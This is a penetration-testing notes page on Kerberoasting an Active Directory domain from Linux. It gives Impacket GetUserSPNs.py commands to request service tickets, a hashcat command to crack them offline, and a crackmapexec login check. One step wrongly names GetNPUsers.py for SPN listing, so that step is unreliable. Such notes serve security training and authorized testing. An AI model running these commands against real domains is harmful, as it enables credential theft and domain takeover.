πŸ”₯Keberoasting with Linux

Kerberoasting

Keberoating is a lateral movement/ privilege escalation technique in AD environments.

This attack targets SPN accounts which are unique identifiers that Kerberos uses to map service instance to a service account. Domain accounts are used to run services to overcome the network authentication limitation of built-in accounts such as NT AUTHORITY

We can execute an attack in multiple ways

  • From a non-domain joined Linux host using valid domain creds

  • From a domain-joined Linux host as root after retrieving the keytab file

  • From a domain-joined Windows host authenticated as a domain user

  • From a domain-joined Windows host with a shell in the context of a domain account

  • As SYSTEM on a domain-joined Windows host

  • From a non-domain joined Windows host using runas /netonly

Obtaining a TGS ticket with Kerberoating does not guarantee a set of valid cred and the ticket must still be cracked offline to get a cleartext password.

A prerequisite to performing Kerberoasting attacks is either domain user credentials (cleartext or just an NTLM hash if using Impacket), a shell in the context of a domain user, or account such as SYSTEM. Once we have this level of access, we can start. We must also know which host in the domain is a Domain Controller so we can query it.

Impacket Tools

Allows us to query accounts from the KDC, we only need a valid set of usernames.

GetUserSPNS.py

We start by using this tool to gather a list of SPNs in the domain. We will need a set of valid domain creds and the IP of a Domain Controller.

We can authenticate to the DC with a cleartext password, NT hash or a Kerberos ticket.

The command below will ask for a password and then print a list of all SPN accounts. 

GetNPUsers.py -dc-ip DC-IP DC.LOCAL/DC-USER

If we end up finding an account that is part of the Domain Admins group, we can try to retrieve and crack one of these tickets which could lead to Domain compromise.

Requesting TGS Tickets

We can pull all TGS tickets by using -request and they will be output in a format ready to send to Hashcat for offline cracking.

GetUserSPNs.py -dc-ip DC-IP dc.LOCAL/DC-USER -request

We can also request a single TGS ticket

GetUserSPNs.py -dc-ip DC-IP dc.LOCAL/DC-USER -request-user user

We can save the ticket(s) to a file using -outputfile FILENAME

Cracking Ticket with Hashcat

hashcat -m 13100 tgs /usr/share/wordlists/rockyou.txt

Testing Access against DC

Once cracked we can confirm our access with a tool like crackmapexec

sudo crackmapexec smb IP -u user -p crackpassword
PreviousLiving Off the LandNextKeberoasting with Windows

Last updated

Was this helpful?